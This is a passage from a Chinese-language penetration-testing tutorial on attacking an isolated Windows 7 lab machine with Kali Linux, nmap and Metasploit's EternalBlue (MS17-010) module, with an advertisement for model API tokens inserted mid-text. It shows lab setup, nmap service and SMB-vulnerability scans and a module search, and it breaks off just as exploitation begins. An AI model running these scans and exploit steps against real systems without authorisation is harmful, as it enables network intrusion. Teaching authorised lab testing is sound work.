1. 渗透测试基础认知
Kali Linux作为渗透测试领域的瑞士军刀,集成了数百种安全工具,其中Metasploit Framework(简称msf)是最具代表性的渗透测试平台。这套开源框架由Rapid7公司维护,包含超过2000个经过验证的渗透模块,从漏洞扫描到后渗透阶段的全流程攻击链都能覆盖。
在实际安全评估中,我们常遇到这样的场景:企业内网存在未打补丁的Windows 7主机,攻击者可能利用MS17-010(永恒之蓝)漏洞在10秒内完成入侵。去年某次红队行动中,我们就通过SMB协议漏洞拿下了整个域控系统。当然,这些操作必须严格在法律授权范围内进行。
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. 实验环境搭建要点
2.1 靶机配置规范
建议使用Windows 7 SP1作为测试靶机,关闭Windows Defender和防火墙。关键配置包括:
- 启用网络发现和文件共享
- 设置静态IP(如192.168.1.100)
- 创建非管理员测试账户
- 禁用自动更新防止补丁修复
重要提示:所有实验必须在隔离的虚拟网络中进行,推荐使用VMware的NAT模式组网,确保不会影响真实网络环境。
2.2 Kali环境准备
更新Kali到最新版本后,需要特别关注这些组件:
bash复制sudo apt update && sudo apt full-upgrade -y
sudo apt install metasploit-framework -y
msfdb init # 初始化数据库
验证模块加载情况:
bash复制msfconsole
> search eternalblue
3. 渗透实战全流程解析
3.1 信息收集阶段
使用Nmap进行主机发现和端口扫描:
bash复制nmap -sV -O 192.168.1.100
关键参数说明:
-sV服务版本探测-O操作系统识别-p-全端口扫描(耗时较长)
若发现445端口开放,可进一步检测SMB漏洞:
bash复制nmap --script smb-vuln-ms17-010 192.168.1.100
3.2 漏洞利用过程
进入msfconsole后分步执行:
bash复制use exp
